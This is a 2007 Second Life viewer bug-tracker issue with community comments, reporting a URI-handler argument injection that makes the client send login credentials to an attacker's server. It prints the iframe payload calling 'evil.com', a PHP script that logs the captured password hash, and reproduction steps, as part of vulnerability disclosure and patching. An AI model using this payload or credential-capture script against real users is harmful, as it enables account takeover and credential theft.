[#VWR-2508] Major Exploit to get access to another users account!

1. Second Life Viewer - VWR

Major Exploit to get access to another users account!

Created: 18/Sep/07 02:59 AM Updated: 29/Jun/08 11:22 AM

Component/s:

User Interface

Affects Version/s:

Source code, 1.18.0, 1.18.1.2, 1.18.2.0, Other (please specify in issue description), 1.18.3 Release Candidate

Fix Version/s:

None

File Attachments:	1. SecondLife-1.18.2.0-uriexploit-patch.zip (2 kb)
Environment:	Windws / Linux (?)

Linden Lab Issue ID:

DEV-11213

Description

« Hide

Quote from: http://www.gnucitizen.org/blog/ie-pwns-secondlife

Eploit Code:
<iframe src='secondlife://" -autologin -loginuri "http://evil.com/sl/record-login.php'></iframe>

Upon visiting the malicious page, the SecondLife client will launch and try to login automatically (-autologin) via the CGI located at http://evil.com/sl/record-login.php. At that moment, the following request is generated to the malicious CGI script. Yes, it is XML-RPC remote call:

[HTTP_RAW_POST_DATA] => <methodCall>
    <methodName>login_to_simulator</methodName>
    <params>
        <param>
            <value>
                <struct>
                    <member>
                        <name>first</name>
                        <value>
                        <string>Elm</string>
                    </value>
                </member>
                <member>
                    <name>last</name>
                    <value>
                    <string>Blanco</string>
                </value>
            </member>
            <member>
                <name>passwd</name>
                <value>
                    <string>$1$[MD5 Hash of the password here]</string>
                </value>
            </member>
            <member>
                <name>start</name>
                <value>
                    <string>last</string>
                </value>
            </member>
            <member>
                <name>version</name>
                <value>
                    <string>1.18.2.0</string>
                </value>
            </member>
            <member>
                <name>channel</name>
                <value>
                    <string>Second Life Release</string>
                </value>
            </member>
            <member>
                <name>platform</name>
                <value>
                    <string>Win</string>
                </value>
            </member>
            ...
            ...
            ...
</methodCall>

Notice [MD5 Hash of the password here] place holder. This is where the user password is located. The password is MD5 hashed for security reason. Well, this is definitely a good thing, although completely pointless since there are plenty of rainbow tables out there, which attackers can use to convert the hash back to normal string.

Keep in mind that most attacker don't event have to convert the hash back to a password string. Attackers can login with the hash itself by forging a request to one of the SecondLife authentication servers. The unhashed password is only needed in situations where the attacker wants to explore other on-line service the victim is currently registered with.
Unfortunately, I cannot construct on-line proof of concept, due to the fact that I need to expose this server to all sorts of attacks, but you can try to repeat my steps. Here is how you can do it:

Get Apache with PHP
Put the following script into a file called login.php:
<?php
ob_start();
print_r($GLOBALS);
error_log(ob_get_contents(), 0);
ob_end_clean();
?>

Tail -f the PHP error log file. Or if you don't know what I am talking about, just skip this step.
Make a page with the following HTML body:

<iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>Open the page inside Internet Explorer

(both IE6 and IE7 are exploitable).

After the SecondLife client fails to login, you will get a message within your php error log, which gives you the credentials plus some other useful info about the victim.

Description

Quote from: http://www.gnucitizen.org/blog/ie-pwns-secondlife Eploit Code: <iframe src='secondlife://" -autologin -loginuri "http://evil.com/sl/record-login.php'></iframe> Upon visiting the malicious page, the SecondLife client will launch and try to login automatically (-autologin) via the CGI located at http://evil.com/sl/record-login.php. At that moment, the following request is generated to the malicious CGI script. Yes, it is XML-RPC remote call: [HTTP_RAW_POST_DATA] => <methodCall> <methodName>login_to_simulator</methodName> <params> <param> <value> <struct> <member> <name>first</name> <value> <string>Elm</string> </value> </member> <member> <name>last</name> <value> <string>Blanco</string> </value> </member> <member> <name>passwd</name> <value> <string>$1$[MD5 Hash of the password here]</string> </value> </member> <member> <name>start</name> <value> <string>last</string> </value> </member> <member> <name>version</name> <value> <string>1.18.2.0</string> </value> </member> <member> <name>channel</name> <value> <string>Second Life Release</string> </value> </member> <member> <name>platform</name> <value> <string>Win</string> </value> </member> ... ... ... </methodCall> Notice [MD5 Hash of the password here] place holder. This is where the user password is located. The password is MD5 hashed for security reason. Well, this is definitely a good thing, although completely pointless since there are plenty of rainbow tables out there, which attackers can use to convert the hash back to normal string. Keep in mind that most attacker don't event have to convert the hash back to a password string. Attackers can login with the hash itself by forging a request to one of the SecondLife authentication servers. The unhashed password is only needed in situations where the attacker wants to explore other on-line service the victim is currently registered with. Unfortunately, I cannot construct on-line proof of concept, due to the fact that I need to expose this server to all sorts of attacks, but you can try to repeat my steps. Here is how you can do it: Get Apache with PHP Put the following script into a file called login.php: <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?> Tail -f the PHP error log file. Or if you don't know what I am talking about, just skip this step. Make a page with the following HTML body: <iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>Open the page inside Internet Explorer (both IE6 and IE7 are exploitable). After the SecondLife client fails to login, you will get a message within your php error log, which gives you the credentials plus some other useful info about the victim.

Show »

All

Comments

Change History

Sort Order:

Ascending order - Click to sort in descending order

[ Permlink | « Hide ]

Till Stirling - 18/Sep/07 03:02 AM

Forgot the source URL: http://www.gnucitizen.org/blog/ie-pwns-secondlife

[ Permlink | « Hide ]

Lex Neva - 18/Sep/07 09:08 AM

Wow... either this is a problem with IE's handling of url-handlers such as secondlife://, or it's a problem with second life's argument parsing. Either way, this is a nasty little piece of work.

It's not a good idea to post exploits like this in the public JIRA, although it's kind of a moot point since the author of the exploit posted it on their website. Please use the Report Bug tool in-world and mention this JIRA issue and mark the issue as an Exploit. LL needs to know about this.

[ Permlink | « Hide ]

meade paravane - 18/Sep/07 11:29 AM

There's forum talk about this, too.

And It's not just IE..

[ Permlink | « Hide ]

Jonash Vanalten - 18/Sep/07 11:41 AM

I've produced a binary patch for this for the windows viewer version 1.18.2.0

I can attach the utility (2kb) if that would be useful to anyone.

[ Permlink | « Hide ]

Jonash Vanalten - 18/Sep/07 11:58 AM

This zip file contains a 6kb executable file which will patch the windows 1.18.2.0 secondlife viewer executable to remove the loginuri feature and prevent the exploit from working.

A readme file is also included explaining how to utilize the patch.

[ Permlink | « Hide ]

Strife Onizuka - 18/Sep/07 05:24 PM

Read the rules.

https://wiki.secondlife.com/wiki/Security_issues
https://wiki.secondlife.com/wiki/Bug_Reporting_101

[ Permlink | « Hide ]

Freija Yoshikawa - 19/Sep/07 11:36 PM

This would appear to be an opening for a "man in the middle" attack,
server acceptance of the XML-RPC with pass-through to the master LL servers for authentication,
any "successful" logins can then have the log stored with unsuccessful logins removed from the sesion logging

[ Permlink | « Hide ]

Gigs Taggart - 24/Sep/07 02:59 AM

This is fixed.